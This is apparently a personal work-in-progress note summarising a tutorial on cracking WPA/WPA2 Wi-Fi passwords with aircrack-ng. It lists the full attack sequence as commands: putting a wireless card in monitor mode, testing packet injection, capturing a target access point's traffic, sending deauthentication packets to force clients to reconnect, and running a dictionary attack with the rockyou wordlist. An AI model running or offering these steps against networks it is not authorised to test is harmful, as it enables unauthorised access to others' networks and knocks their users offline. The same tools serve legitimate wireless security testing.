---
title: "COM: aircrack-ng"
date: 2023-02-22
tags: [ 'wip' ]
categories: wip
---
Notes from article https://nooblinux.com/crack-wpa-wpa2-wifi-passwords-using-aircrack-ng-kali-linux/

{{<toc>}}

wordlist: https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt (133MB)


## Prerequisites

```
sudo apt-get install aircrack-ng
```

## Put NIC in monitor mode
```
ip a
```

shows NIC named 'wlp2s0'.

Search for networks
```
sudo iwlist wlp2s0 scan
```
Take note of:

- ESSID
- MAC
- channel

Put NIC in monitor mode
```
sudo airmon-ng
sudo airmon-ng start wlp2s0
sudo airmon-ng check kill
# Confirm that card is in monitor mode
sudo iwconfig
```



## Test card for packed injection
```
sudo aireplay-ng --test wlp2s0mon
```

## Sniff
Sniff packets
```
airodump-ng wlp2s0mon
airodump-ng --bssid MAC --channel CHANNEL --write FILENAME CARDNAME
```

Send deauth packets.
```
sudo aireplay-ng --deauth 50 -a BSSID CARDNAME
```


## Crack
Use the .cap file for FNAME
```
aircrack-ng sniff-01.cap
sudo aircrack-ng FNAME -w WORDLIST
```


## Troubleshooting
```
# aircrack-ng sniff-01.cap -w rockyou.txt 
Packets contained no EAPOL data; unable to process this AP.
```

https://stackoverflow.com/questions/60690782/error-packets-contained-no-eapol-data-unable-to-process-this-ap


## Other
```
airmon-ng stop wlp2s0mon
```
